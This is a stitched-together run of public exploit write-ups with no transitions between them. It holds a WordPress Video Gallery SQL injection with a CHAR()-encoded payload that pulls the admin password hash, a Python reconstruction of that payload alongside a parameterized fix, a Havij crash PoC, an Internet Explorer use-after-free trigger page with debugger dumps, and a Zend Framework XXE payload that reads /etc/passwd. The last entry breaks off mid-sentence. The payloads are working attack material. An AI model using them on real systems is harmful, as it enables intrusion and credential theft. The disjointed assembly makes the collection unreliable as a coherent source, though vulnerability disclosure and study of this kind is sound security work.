# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
# Date: 20-01-2015
# Software Link: https://wordpress.org/plugins/contus-video-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

$_GET['vid'] is not escaped. google_adsense() is accessible for everyone.

File: contus-video-gallery\hdflvvideoshare.php

add_action('wp_ajax_googleadsense' ,'google_adsense');
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');

function google_adsense(){
    global $wpdb;
    $vid = $_GET['vid'];
    $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
    $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
    $google_adsense = unserialize($query);
    echo $google_adsense['googleadsense_code'];
    die();
}

http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html

2. Proof of Concept

http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)

3. Solution:

Update to version 2.8
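The two get_var() calls in the plugin chain: the request's vid is concatenated into the first query, and whatever that query returns is concatenated into the second. The PoC uses that chain in two stages. The Python/sqlite3 reconstruction below is an added example, not the plugin's PHP: it runs the plugin's logic and a hardened version against a constructed database, with the two-stage payload written as literal strings instead of CHAR() so the mechanism is visible. The wp_ prefix, the table contents and the password hash are constructed values.

```python
import sqlite3
from typing import Optional

PREFIX = "wp_"  # WordPress default table prefix, assumed for the demonstration


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the plugin's two tables and wp_users.
    The password hash is a made-up value, not real data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {PREFIX}hdflvvideoshare (vid INTEGER, google_adsense_value INTEGER);
        CREATE TABLE {PREFIX}hdflvvideoshare_vgoogleadsense (id INTEGER, googleadsense_details TEXT);
        CREATE TABLE {PREFIX}users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO {PREFIX}hdflvvideoshare VALUES (1, 10);
        INSERT INTO {PREFIX}hdflvvideoshare_vgoogleadsense VALUES (10, 'ad-unit-10');
        INSERT INTO {PREFIX}users VALUES (1, 'admin', '$P$Bconstructedhash');
    """)
    return conn


def get_var(conn: sqlite3.Connection, sql: str, params=()) -> Optional[str]:
    """Mimic $wpdb->get_var(): the first column of the first row, or None."""
    row = conn.execute(sql, params).fetchone()
    return None if row is None else row[0]


def google_adsense_vulnerable(conn: sqlite3.Connection, vid: str) -> Optional[str]:
    """The plugin's logic with string concatenation: vid lands in the first query's
    SQL text, and the first query's result lands in the second query's SQL text."""
    adsense_id = get_var(conn, "SELECT google_adsense_value FROM " + PREFIX +
                         "hdflvvideoshare WHERE vid =" + vid)
    return get_var(conn, "SELECT googleadsense_details FROM " + PREFIX +
                   "hdflvvideoshare_vgoogleadsense WHERE id=" + str(adsense_id))


def two_stage_payload() -> str:
    """The construction the PoC encodes with CHAR(): stage 1 makes the first query
    return stage 2, and stage 2 makes the second query return a PHP-serialized
    array whose googleadsense_code element is the user_pass column."""
    stage2 = (
        "0 UNION SELECT 'a:1:{s:18:\"googleadsense_code\";s:' || length(user_pass) "
        "|| ':\"' || user_pass || '\";}' FROM " + PREFIX + "users WHERE ID = 1"
    )
    return "0 UNION SELECT '" + stage2.replace("'", "''") + "'"


def google_adsense_fixed(conn: sqlite3.Connection, vid: str) -> Optional[str]:
    """Hardened: vid must be a decimal integer and is bound as a parameter, and the
    id returned by the first lookup is bound as well instead of being concatenated
    (the equivalent in WordPress is $wpdb->prepare() with %d placeholders)."""
    try:
        vid_int = int(vid, 10)
    except ValueError:
        return None
    adsense_id = get_var(conn, "SELECT google_adsense_value FROM " + PREFIX +
                         "hdflvvideoshare WHERE vid = ?", (vid_int,))
    if adsense_id is None:
        return None
    return get_var(conn, "SELECT googleadsense_details FROM " + PREFIX +
                   "hdflvvideoshare_vgoogleadsense WHERE id = ?", (adsense_id,))


if __name__ == "__main__":
    db = make_db()
    print(google_adsense_vulnerable(db, two_stage_payload()))
    print(google_adsense_fixed(db, two_stage_payload()))
```

Binding the second query matters as much as the first: a value read from the database is still data, not SQL, and the PoC works precisely because the plugin treats it as SQL. Independently of the query fix, the page notes the AJAX action is reachable without login; a capability check on the handler removes the unauthenticated exposure even where a query bug remains.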

Havij Pro - Crash (PoC)

#!/usr/bin/env python
#Exploit Title:Havij Pro Crash POC
# Tested:windows7
#Software Link:http://www.itsecteam.com/
#Version:1.17
#Email:i_7e1@outlook.com
#Author:M1x7e1@Safeye Team
#run python poc.py
#copy content to target
#click Analyze

## EDB-Note: tested and verified using version 1.6 Pro

content = "\x41" * 8000
file = open("xx.txt", "w")
file.write(content)
file.close()
<!--
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/
research(at)bluefrostsecurity.de

BFS-SA-2015-001                                                   12-August-2015
________________________________________________________________________________

Vendor:             Microsoft, http://www.microsoft.com
Affected Products:  Internet Explorer
Affected Version:   IE 8-11
Vulnerability:      CTreeNode::GetCascadedLang Use-After-Free Vulnerability
CVE ID:             CVE-2015-2444
________________________________________________________________________________

I. Impact

If an attacker succeeds in bypassing the Memory Protector and Isolated Heap protection mechanisms this vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
________________________________________________________________________________

II. Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::GetCascadedLang function. The following analysis was performed on Internet Explorer 11 on Windows 8.1 (x64).

The following HTML page demonstrates the problem:
-->
<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script>
function Trigger() {
  for(i=0; i < document.getElementsByTagName("meter").length; i++) {
    document.getElementsByTagName("meter")[i].innerText = "a";
  }
}
function reload() {
  location.reload();
}
setTimeout("reload()", 1000);
</script>
<button><label><style>label{}</style><form>
<meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter>
<select></select><button></button><form><form>
<input><script>Trigger();</script>
<form><style>form{-ms-behavior: url("c");}</style></form>
</html>
<!--
With page heap enabled, visiting that page results in the following crash:

(7c0.408): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll -
eax=00000000 ebx=12698fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=12696fb8
eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CreateCoreWebView+0x1e0234:
6fea5a44 81b828030000506ffb6f cmp     dword ptr [eax+328h],offset MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50) ds:002b:00000328=????????

0:005> ub
MSHTML!CTreeNode::GetCascadedLang+0x5f:
6fea5a2b 8945f8          mov     dword ptr [ebp-8],eax
6fea5a2e 8945f0          mov     dword ptr [ebp-10h],eax
6fea5a31 8b4710          mov     eax,dword ptr [edi+10h]
6fea5a34 85c0            test    eax,eax
6fea5a36 740a            je      MSHTML!CTreeNode::GetCascadedLang+0x76 (6fea5a42)
6fea5a38 f6400c04        test    byte ptr [eax+0Ch],4
6fea5a3c 0f859a020000    jne     MSHTML!CTreeNode::GetCascadedLang+0x30f (6fea5cdc)
6fea5a42 8b07            mov     eax,dword ptr [edi]

0:005> !heap -p -a edi+10
    address 12696fc8 found in
    _DPH_HEAP_ROOT @ a961000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 a9646e8:         12696fb8               48 -         12696000             2000
    71e694ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
    779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c
    778a77ce ntdll!RtlpAllocateHeap+0x0004665a
    77861134 ntdll!RtlAllocateHeap+0x0000014d
    6fa31dd5 MSHTML!CLabelElement::CreateElement+0x00000015
    6f8a5b4d MSHTML!CreateElement+0x00000084
    6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078
    6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d
    6f91d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026
    6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5
    6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c
    6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c
    6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131
    6f91a377 MSHTML!CHtmPost::ProcessTokens+0x000006af
    6f914952 MSHTML!CHtmPost::Exec+0x000001e4
    6f991118 MSHTML!CHtmPost::Run+0x0000003d
    6f99107e MSHTML!PostManExecute+0x00000061
    6f9994a2 MSHTML!PostManResume+0x0000007b
    6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e
    6f7fd865 MSHTML!GlobalWndOnMethodCall+0x0000016d
    6f7fd18a MSHTML!GlobalWndProc+0x000002e5
    75a68e71 user32!_InternalCallWinProc+0x0000002b
    75a690d1 user32!UserCallWinProcCheckWow+0x0000018e
    75a6a66f user32!DispatchMessageWorker+0x00000208
    75a6a6e0 user32!DispatchMessageW+0x00000010
    710600d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    7108d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b
    71c7d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c
    70ef3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024
    7787ad1f ntdll!__RtlUserThreadStart+0x0000002f
    7787acea ntdll!_RtlUserThreadStart+0x0000001b

0:005> db edi+10
12696fc8  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
12696fd8  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
12696fe8  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
12696ff8  00 00 00 00 00 00 00 00-?? ?? ?? ?? ?? ?? ?? ??  ........????????
12697008  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
12697018  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
12697028  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
12697038  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

This looks like a use-after-free on memory which was previously freed by the ProtectedFree implementation (and zeroed-out) and thus the memory is not yet marked as free by the heap manager. To verify this assumption, we first disable the Memory Protect feature to see if it's really accessing freed memory:

C:\>reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MEMPROTECT_MODE"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\Feature Control\FEATURE_MEMPROTECT_MODE
    iexplore.exe    REG_DWORD    0x0

If we trigger the crash again, we notice that this time freed memory is accessed and the memory was indeed previously allocated by the ProtectedFree function.

(12c.4a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0e958fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=0e982fb8
eip=70595a31 esp=0b3cbda0 ebp=0b3cbdc0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::GetCascadedLang+0x65:
70595a31 8b4710          mov     eax,dword ptr [edi+10h] ds:002b:0e982fc8=????????

0:006> !heap -p -a edi+10
    address 0e982fc8 found in
    _DPH_HEAP_ROOT @ aa31000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    aa34f70:          e982000             2000
    72909712 verifier!AVrfDebugPageHeapFree+0x000000c2
    77906061 ntdll!RtlDebugFreeHeap+0x0000003c
    778a69ea ntdll!RtlpFreeHeap+0x00044b2f
    77861eaa ntdll!RtlFreeHeap+0x000001b6
    6feacbbd MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    701a8a95 MSHTML!CLabelElement::`vector deleting destructor'+0x00000025
    6fef7001 MSHTML!CBase::SubRelease+0x00000045
    6ff14ee2 MSHTML!CElement::PrivateExitTree+0x00000060
    6ff15c8a MSHTML!CMarkup::DestroySplayTree+0x000003ab
    6ff16b26 MSHTML!CMarkup::UnloadContents+0x00000d33
    70198f3c MSHTML!CMarkup::TearDownMarkupHelper+0x000000a7
    70198e63 MSHTML!CMarkup::TearDownMarkup+0x00000058
    7018af24 MSHTML!COmWindowProxy::SwitchMarkup+0x000004f3
    70876d6a MSHTML!COmWindowProxy::ExecRefresh+0x00000a1d
    70876ee3 MSHTML!COmWindowProxy::ExecRefreshCallback+0x00000023
    6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d
    6feed18a MSHTML!GlobalWndProc+0x000002e5
    75a68e71 user32!_InternalCallWinProc+0x0000002b
    75a690d1 user32!UserCallWinProcCheckWow+0x0000018e
    75a6a66f user32!DispatchMessageWorker+0x00000208
    75a6a6e0 user32!DispatchMessageW+0x00000010
    71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b
    7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c
    716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024
    7787ad1f ntdll!__RtlUserThreadStart+0x0000002f
    7787acea ntdll!_RtlUserThreadStart+0x0000001b

0:006> kb
ChildEBP RetAddr  Args to Child
0b3cbdc0 7059559d 1330afc8 0b3cc1ec 00000001 MSHTML!CTreeNode::GetCascadedLang+0x65
0b3cbe78 700173bf 0ab19fa0 0e615fa0 00000003 MSHTML!CStyleSheetArray::BuildListOfProbableRules+0x2d5
0b3cbf3c 6fff6d3c 0b3cc1ec 00000001 00000003 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x57
0b3cc190 70284613 0b3cc1ec 00000003 00000400 MSHTML!CMarkup::ApplyStyleSheets+0xca
0b3cc1c4 701a742e 0b3cc1ec 00000000 0aa41bb8 MSHTML!CElement::ApplyBehaviorCss+0x9e
0b3cc46c 700adfe3 00000004 07450000 0aa41bb8 MSHTML!CElement::ProcessPeerTask+0xc1f
0b3cc488 700adf3c 00000000 1375dfe8 0aa41bb8 MSHTML!CMarkup::ProcessPeerTaskContext+0x8e
0b3cc4a0 700d3070 0aa41bb8 00000000 00000000 MSHTML!CMarkup::ProcessPeerTasks+0x3f
0b3cc550 6ff17539 00000001 00000000 0b3cc57c MSHTML!CMarkup::UnloadContents+0x1017
0b3cc574 6fef705c 0f4febb8 00000001 6feeccb0 MSHTML!CMarkup::Passivate+0x89
0b3cc58c 6feecccc 0f4febb8 0f4febb8 00000001 MSHTML!CBase::PrivateRelease+0xbc
0b3cc5a8 6ff040f6 0f4febb8 0b3cc5d0 6feecf70 MSHTML!CMarkup::Release+0x18
0b3cc5c4 703edeb0 0f318f18 0e97cf90 00000000 MSHTML!CTxtSite::Release+0xc2
0b3cc5d8 703ede77 00000000 0e97cf90 00000000 MSHTML!CImplPtrAry::ReleaseAndDelete+0x2e
0b3cc5ec 70481a67 00000000 0b3cc624 0e97cf90 MSHTML!CFormElement::DetachExtraFormInputSiteByIndex+0x22
0b3cc5fc 701b66e3 0e97cf90 0b3cc618 0b3cc680 MSHTML!CFormElement::DetachAllExtraFormInputSites+0x13
0b3cc60c 6ff15be3 0b3cc624 0b3cc690 7019abb0 MSHTML!CFormElement::Notify+0x76
0b3cc680 6ff16b26 00000001 00000001 0f2ace30 MSHTML!CMarkup::DestroySplayTree+0x2dd
0b3cc730 70198f3c 00000000 00000001 0c9d4bd0 MSHTML!CMarkup::UnloadContents+0xd33
0b3cc748 70198e63 00000001 00000001 0f33cbb8 MSHTML!CMarkup::TearDownMarkupHelper+0xa7
0b3cc770 7018af24 00000001 00000001 0b3cc838 MSHTML!CMarkup::TearDownMarkup+0x58
0b3cc818 70876d6a 0f33cbb8 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4f3
0b3cc8fc 70876ee3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1d
0b3cc910 6feed865 0aeb9f68 00005004 
0ba04cc8 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23 0b3cc95c 6feed18a 3e26b724 6feec290 00008002 MSHTML!GlobalWndOnMethodCall+0x16d 0b3cc9ac 75a68e71 000103d0 00008002 00000000 MSHTML!GlobalWndProc+0x2e5 0b3cc9d8 75a690d1 6feec290 000103d0 00008002 user32!_InternalCallWinProc+0x2b 0b3cca6c 75a6a66f 6feec290 00000000 00008002 user32!UserCallWinProcCheckWow+0x18e 0b3ccad8 75a6a6e0 30748176 0b3cfcb0 71a700d8 user32!DispatchMessageWorker+0x208 0b3ccae4 71a700d8 0b3ccb24 11ce0e48 1161cfe0 user32!DispatchMessageW+0x10 0b3cfcb0 71a9d0d8 0b3cfd7c 71a9cd50 11cdeff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 0b3cfd70 7271d81c 11ce0e48 0b3cfd94 71b05f70 IEFRAME!LCIETab_ThreadProc+0x37b 0b3cfd88 716f3991 11cdeff0 716f3900 716f3900 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c 0b3cfdc0 755f7c04 0e502fe8 755f7be0 3b839130 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 0b3cfdd4 7787ad1f 0e502fe8 3972bde9 00000000 KERNEL32!BaseThreadInitThunk+0x24 0b3cfe1c 7787acea ffffffff 7786022b 00000000 ntdll!__RtlUserThreadStart+0x2f 0b3cfe2c 00000000 716f3900 0e502fe8 00000000 ntdll!_RtlUserThreadStart+0x1b If we check the accessed memory location just before the JavaScript method location.reload() is called, we can see where the memory for the CLabelElement object was allocated. 
0:020> !heap -p -a 0e982fc8 address 0e982fc8 found in _DPH_HEAP_ROOT @ aa31000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) aa34f70: e982fb8 48 - e982000 2000 MSHTML!CLabelElement::`vftable' 729094ec verifier!AVrfDebugPageHeapAllocate+0x0000023c 779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c 778a77ce ntdll!RtlpAllocateHeap+0x0004665a 77861134 ntdll!RtlAllocateHeap+0x0000014d 70121dd5 MSHTML!CLabelElement::CreateElement+0x00000015 6ff95b4d MSHTML!CreateElement+0x00000084 70104768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078 7000d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d 7000d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026 7000d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5 7000d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c 7000ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c 7000ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131 7000a377 MSHTML!CHtmPost::ProcessTokens+0x000006af 70004952 MSHTML!CHtmPost::Exec+0x000001e4 70081118 MSHTML!CHtmPost::Run+0x0000003d 7008107e MSHTML!PostManExecute+0x00000061 700894a2 MSHTML!PostManResume+0x0000007b 700a04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e 6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d 6feed18a MSHTML!GlobalWndProc+0x000002e5 75a68e71 user32!_InternalCallWinProc+0x0000002b 75a690d1 user32!UserCallWinProcCheckWow+0x0000018e 75a6a66f user32!DispatchMessageWorker+0x00000208 75a6a6e0 user32!DispatchMessageW+0x00000010 71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b 7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c 716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024 7787ad1f ntdll!__RtlUserThreadStart+0x0000002f 7787acea ntdll!_RtlUserThreadStart+0x0000001b ________________________________________________________________________________ III. 
Mitigation The issue was fixed in MS15-079 which should be installed to resolve the issue. ________________________________________________________________________________ IV. Disclosure Timeline - 2015-05-11 Vulnerability reported to secure@microsoft.com - 2015-05-11 Acknowledgement of received report - 2015-05-14 Microsoft confirms that they successfully reproduced the issue - 2015-06-03 Requested a status update - 2015-06-03 Microsoft confirms that they are currently working on a fix and they want to know if hitting the August patch day would be acceptable, because that would be 2 days after the 90 day disclosure timeline - 2015-07-14 Requested a status upate - 2015-07-15 Microsoft confirms to be on track for the August patch day - 2015-08-10 Requested another status update - 2015-08-11 Microsoft resolves issue in MS15-079 ________________________________________________________________________________ Credit: Bug found by Moritz Jodeit of Blue Frost Security GmbH. ________________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@bluefrostsecurity.de for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages. Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply. -->
HireHackking

Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection

=============================================
- Release date: 12.08.2015
- Discovered by: Dawid Golunski
- Severity: High
- CVE-ID: CVE-2015-5161
=============================================

I. VULNERABILITY
-------------------------

Zend Framework <= 2.4.2    XML eXternal Entity Injection (XXE) on PHP FPM
Zend Framework <= 1.12.13

II. BACKGROUND
-------------------------

- Zend Framework

From the http://framework.zend.com/about/ website:

"Zend Framework 2 is an open source framework for developing web applications and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and utilises most of the new features of PHP 5.3, namely namespaces, late static binding, lambda functions and closures. Zend Framework 2 evolved from Zend Framework 1, a successful PHP framework with over 15 million downloads."

- PHP FPM

http://php.net/manual/en/install.fpm.php

"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with some additional features (mostly) useful for heavy-loaded sites."

Starting from release 5.3.3 in early 2010, PHP merged the php-fpm FastCGI process manager into its codebase. However, PHP-FPM was available earlier as a separate project (http://php-fpm.org/).

III. INTRODUCTION
-------------------------

The XML standard defines a concept of external entities. An XXE (XML eXternal Entity) attack is an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be forced to open arbitrary files and/or network resources. Exploiting XXE issues on PHP applications may also lead to denial of service or, in some cases (for example, when an 'expect' PHP module is installed), to command execution.

Independent security research of Zend Framework revealed that it is possible to bypass the XXE security controls within the framework when the PHP application using Zend XML related classes (e.g. Zend_XmlRpc_Server, Zend_Feed, Zend_Config_Xml etc.) from Zend Framework is served via PHP FPM. Bypassing the controls may allow XXE attacks and lead to the aforementioned exploitation possibilities on systems where the XML parser is set to resolve entities.

IV. DESCRIPTION
-------------------------

The security controls within the Zend Framework mitigate the XXE attack vectors by first calling libxml_disable_entity_loader(), and then looping through the DOMDocument nodes testing if any is of type:

XML_DOCUMENT_TYPE_NODE

If so, an exception is raised and PHP script execution is halted.

These controls have been included in the scan() function of a Zend_Xml_Security class located in the following paths depending on the code branch of Zend Framework:

ZendFramework-1.12.13/library/Zend/Xml/Security.php
ZendFramework-2.4.2/library/ZendXml/Security.php

In case of the latest version of ZendFramework-1.12.13, the relevant code blocks from the scan() function look as follows:

---[library/Zend/Xml/Security.php ]---

    public static function scan($xml, DOMDocument $dom = null)
    {
        if (self::isPhpFpm()) {
            self::heuristicScan($xml);
        }

        if (!self::isPhpFpm()) {
            $loadEntities = libxml_disable_entity_loader(true);
            $useInternalXmlErrors = libxml_use_internal_errors(true);
        }

        // Load XML with network access disabled (LIBXML_NONET)
        $result = $dom->loadXml($xml, LIBXML_NONET);

        restore_error_handler();

        if (!self::isPhpFpm()) {
            libxml_disable_entity_loader($loadEntities);
            libxml_use_internal_errors($useInternalXmlErrors);
        }

        if (!$result) {
            return false;
        }

        // Scan for potential XEE attacks using ENTITY, if not PHP-FPM
        if (!self::isPhpFpm()) {
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    if ($child->entities->length > 0) {
                        require_once 'Exception.php';
                        throw new Zend_Xml_Exception(self::ENTITY_DETECT);
                    }
                }
            }
        }

        if (isset($simpleXml)) {
            $result = simplexml_import_dom($dom);
            if (!$result instanceof SimpleXMLElement) {
                return false;
            }
            return $result;
        }
        return $dom;

--------------------------------------

As we can see from the code, the application disables the entity loader (via libxml_disable_entity_loader), it also disables network access (LIBXML_NONET), and it additionally scans the provided XML for the presence of XML entities to prevent potential entity expansion attacks. The code successfully prevents most XXE attacks.

However, as the PHP libxml_disable_entity_loader() function was reported not to be thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks.

In the code above we see the check !self::isPhpFpm(), which determines the type of interface between the web server and PHP (through the php_sapi_name() function). If the SAPI is FPM-CGI (i.e. PHP-FPM), the following heuristicScan function gets executed:

---[library/Zend/Xml/Security.php ]---

    protected static function heuristicScan($xml)
    {
        if (strpos($xml, '<!ENTITY') !== false) {
            require_once 'Exception.php';
            throw new Zend_Xml_Exception(self::ENTITY_DETECT);
        }
    }

--------------------------------------

It validates the provided XML by searching for any entity declaration and throws an exception if it finds one. Although this check cannot be bypassed by simply adding spaces or changing the characters to lower case (an XML parser would reject such a declaration as invalid), this security check is nevertheless insufficient. The XML format allows different encodings to be used, hence it is possible to bypass the check by supplying specifically encoded XML content. For example, a UTF-16 encoding, which uses 2-byte characters, is enough to bypass the ENTITY string check, because the literal byte sequence '<!ENTITY' never occurs in the undecoded input.

Apart from the ENTITY check, the code also adds the aforementioned LIBXML_NONET parameter to catch entities referring to network resources. This limitation can also be bypassed, as shown in the proof of concept exploit.

This makes the Zend Framework vulnerable to XXE injection attacks.

V. PROOF OF CONCEPT
-------------------------

Below is a simple PHP application using Zend Framework to implement an XML-RPC server for demonstration:

---[ zend_xmlrpc_server.php ]--

<?php
// Simple XML-RPC SERVER

function helloworld() {
    $text = "Hello world! This request was executed via ".php_sapi_name().".";
    return $text;
}

set_include_path("./ZendFramework-1.12.13/library/");
require_once("./ZendFramework-1.12.13/library/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();

$server = new Zend_XmlRpc_Server();
$server->addFunction('helloworld');
echo $server->handle();

?>

-------------------------------

This test application is hosted on an Apache server with PHP-FPM.

Requesting:

POST /zend_poc/zend-xmlrpc-server.php HTTP/1.1
Host: apache-php-fpm

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>helloworld</methodName>
</methodCall>

should return:

<methodResponse><params><param><value><string>Hello world! This request was executed via fpm-fcgi.</string></value></param></params>
</methodResponse>

In order to exploit the XXE vulnerability contained in the Zend Framework, an attacker can pass XML data containing external entities similar to:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE methodCall [
  <!ENTITY pocdata SYSTEM "file:///etc/passwd">
]>
<methodCall>
  <methodName>retrieved: &pocdata;</methodName>
</methodCall>

Feeding the above data to the zend-xmlrpc-server.php script will result in an error:

